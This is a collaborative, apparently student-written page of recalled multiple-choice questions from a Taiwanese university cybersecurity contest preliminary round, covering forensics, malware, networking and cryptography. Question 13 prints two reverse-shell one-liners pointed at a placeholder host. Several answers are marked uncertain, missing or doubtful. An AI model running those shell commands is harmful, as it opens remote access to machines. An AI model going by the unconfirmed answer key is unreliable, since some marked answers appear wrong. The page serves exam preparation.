# 113學年度 金盾獎初賽【大專校院組】
>應該有一些人想準備但官方沒有釋出考古題
>所以多少幫忙紀錄給有心想準備的同學們OwO
歡迎幫忙共筆補充><
覺得排版分類不好歡迎直接修正owo
- 競賽時間:$2$ 小時。
- 競賽模式:初賽模式採選擇題作答,~~共 80 題~~ 共 $50$ 題,皆為**單選題**,每題分數依難易度給分,答錯不扣分。
- 試題範圍:包含逆向工程(Reverse)、網站相關(Web)、具漏洞的服務(Pwn)、加解密演算法(Crypto)、其他綜合(Misc)、鑑識(Forensic)。
[toc]
## 原始題目(簡略版)
為什麼要在意易揮發 無檔案攻擊 斷電
1. 給一份 code 問哪邊有用 MACRO
- 選有 M 的? 第 13 行
2. 哪些是 DDOS 攻擊?
- (O) TCP RST Flood, Tear Drop, TCP Fragment Attack
- (X) Directory Traversal Attack, DNS Poisoning
3. 何者可以取得應用程式啟動紀錄
- **prefetch**
- 瀏覽歷程
4. 哪個技術可以實現多個 IP 對到同一個 domain?
- **Fast flux DNS**
- DNS ZONE Transfer
- DNS intergration
- Dynamic DNS
5. Volatility 中,如何發現使用雙向鏈表(double linked-list)技術隱藏的惡意程序或檔案。
- pslist
- **psscan**
- psdump
- pstree
6. Shor’s Algorithm 是一種量子演算法,能有效破解基於大數質因數分解的 RSA 加密。該演算法之所以能在指數時間內完成分解,依賴的是量子的哪種特性?
- **量子疊加**
- 量子穿隧
- 量子相干
- 量子不確定性
7. 哪一個演算法容易遭受中間人攻擊?
- RSA
- DES
- MAC
- HMAC
8. 在 Windows 系統中,不允許密碼暴力破解的情況,攻擊者仍可以使用哪種攻擊方式登入其他User? Administrator:500:(HASH):(HASH)
- **Pass the Hash**
- Pass the Key
- Pass the ticket
- Pass the token
9. [File signature](https://en.wikipedia.org/wiki/List_of_file_signatures) start with 4D 5A ..
- **dll**
- jpeg
- docx
- ps1
10. 可以提取 Cobalt Strike 配置檔案的工具
- **1768.py**
- Cheat Engine
- hollows hunter
11. 內外網無法連線 隱藏內網 IP
- Web application Firewall
- Intrusion Prevention System
- proxy server
>[name=隨風]這個嗎?
- Radius 伺服器
12. Nmap 功能
- (O) 作業系統偵測、
- (X) 監測網路封包流量
13. 哪個沒有開 reverse shell?
- `nc <IP> -e sh`
- `sh -i >& /dev/tcp/<IP>/<port> 0>&1`
14. Kerberos
- **ticket**
- token
- secret
- credential
15. ..啟動日誌..
- **System.evtx**
- Application.envt
- Security.envt
16. svchost.exe 下列哪個行為可能是駭客偽裝的
- **啟動路徑在 C:\system\..**
- svchost 的父程序是 service.exe
- 啟動時間比開機時間晚一分鐘
18. 修改哪一個 regidit 是開機自啟動???? ***題目選項皆不確定**<!--有確定的可以幫我拿掉 桿蟹><-->
- **\SOFTWARE\Microsoft\Windows\CurrentVersion\Run**
- \SOFTWARE\Microsoft\Windows\CurrentVersion\
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Startup
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Auto
19. 哪一個 regedit 不是開機自啟動@@?? ***題目選項皆不確定**<!--有確定的可以幫我拿掉 桿蟹><-->
- \SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
- \SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
- \SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- XXX\polices\Explorer
>[name=隨風]這個嗎?
20. MAC IP
- **ARP spoofing**
- IP spoofing
21. 哪個手法是 MITRE ATT&CK 的 Obfuscated Files or Information 技術
- sofeware packing
- binary padding
- **dll injection**
>[name=隨風]這個嗎?
- steganography
22. ???? 何者屬於程式流劫持技術
- SEH Overwrite
- **heap spraying**
- Memory swap
23. 2018 OWASP IoT Top 10
- **弱密碼**
- Injection
24. 給一段函式的組合語言,問開頭 register 行為變化
- **Stack 88 bytes, EBP ESP**
- 88 bits EBP EIP
- 88 bytes RBP EIP
- 88 bits EBP ESP
25. 給你一段 code ,問回傳的變數(DWORD)是幾 bytes ?
- 1 byte
- 2 bytes
- 4 bytes
- 8 bytes
26. 何者非駭客入侵前會調查的內容?
- 公司IP範圍
- 公司域名
- **公司股票趨勢**
27. Linux 存密碼會用甚麼方式
- **Hash**
- Asymmetric Encryption
- Symmetric Encryption
- Encoding
28. 有一個惡意軟體想要躲避沙箱偵測的話,何種方法較不適合
- 先呼叫sleep()一陣子
- 檢查是否為一般使用者的鍵盤滑鼠操作行為
- 等待關機後的下次開機再執行
- **ping 8.8.8.8**
29. 軟體公司供應鏈攻擊
- **參與開源程式開發過程..**
- 軟體漏洞
- 殭屍網路
30. 入侵指標
- BOT(Robot)
- IOT(Internet Of Things)
- APT(Advanced Persistent Threat)
- **IoC(Indicators of Compromise)**
31. CreateMutexA
- 提權
- **避免程序重複開啟**
32. 題組題,內文提及某物聯網設備...
- 韌體更新
- 更換密碼
- 防火牆阻擋
- 不啟用沒在用的服務
33. 減緩目錄遍歷攻擊
- **.**
- <>
- ;
- '
34. 以下何者不是駭客駭入windows後會使用原本內建在電腦中的工具?
- at.exe
- **nc.exe**
- bitsadmin.exe
- certutil.exe
35. 駭客最喜歡哪一種虛擬貨幣比較追查不到金流?
- 波場幣(TRX)
- 比特幣
- 乙太幣(ETH)
- 門羅幣(XMR)
>[name=隨風]這個嗎?
37. 一個被 botnet 感染的XXX,攻擊者可以做到什麼?
- DDOS
- 勒索
38. DLL side loading 哪一個目錄最優先被系統執行?
- system
- system32
- **當前目錄**
39. 去中心化星際檔案系統(IPFS),哪些選項是錯誤的?
- 可以透過XXX阻塞
- 釣魚
(X) 駭客可以隨意修改上傳IPFS的檔案
40. 哪一個網卡模式最能夠隔離 VM 和主機?
- NAT
- bridge
- **host-only**
- 自訂模式
## tags
### 密碼學與安全協議
- 量子安全密碼學(後量子密碼學)
- 中間人攻擊、RSA、DES、MAC、HMAC
- Kerberos
- 隱寫術 Steganography
- 虛擬貨幣
- 去中心化
---
### DNS
- Fast-flux DNS
- DNS Zone Transfer
- Dynamic DNS
### 攻擊
- DDoS 攻擊
- TCP RST Flood
- Tear Drop
- TCP Fragment Attack
- DNS Poisoning
- ARP Spoofing
- OWASP Top 10
- Ransomeware 勒索病毒
- Botnet 殭屍網路
- DLL injection
---
### **惡意軟體分析與利用技術**
- 軟體加殼 Software packing
- 二進位填充 Binary padding
- DLL Injection
- Heap spraying
- nc reverse shell
---
### Windows
- Prefetch
- Explorer 進程
- 系統事件日誌
System.evtx
- Svchost.exe
- At.exe
- Windows 註冊表自啟動項
- `\SOFTWARE\Microsoft\Windows\CurrentVersion\Run`
- `\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce`
---
### 安全工具與命令
- Volatility 插件
- pslist
- psscan
- psdump
- pstree
- Nmap 功能
- 入侵防禦系統 Intrusion Prevention System(IPS)
- At.exe
- Netcat(nc)
---
### 無分類
- File signature
- 水坑攻擊
---
<!--### tags
sofeware packing
binary padding
量子安全密碼學(後量子密碼學)
stegangraphy
prefetch
DDOS TCP RST Flood,tear drop, tcp fragment attack, DNS poisoning
Fast-flux DNS
DNS zone trasfer
Dynamic DNS
Volatility pslist psscan psdump pstree
man-in-the-middle RSA DES MAC HMAC
File signature
DLL injection
Intrusion prevention system(IPS)
arp spoofing
explorer
nmap 功能
nc reverse shell
kerberos
System.evtx
svchost.exe
at.exe
\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
heap spraying
memory swap
Sign in via Google
Sign in via Facebook
Sign in via X(Twitter)
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Connect another wallet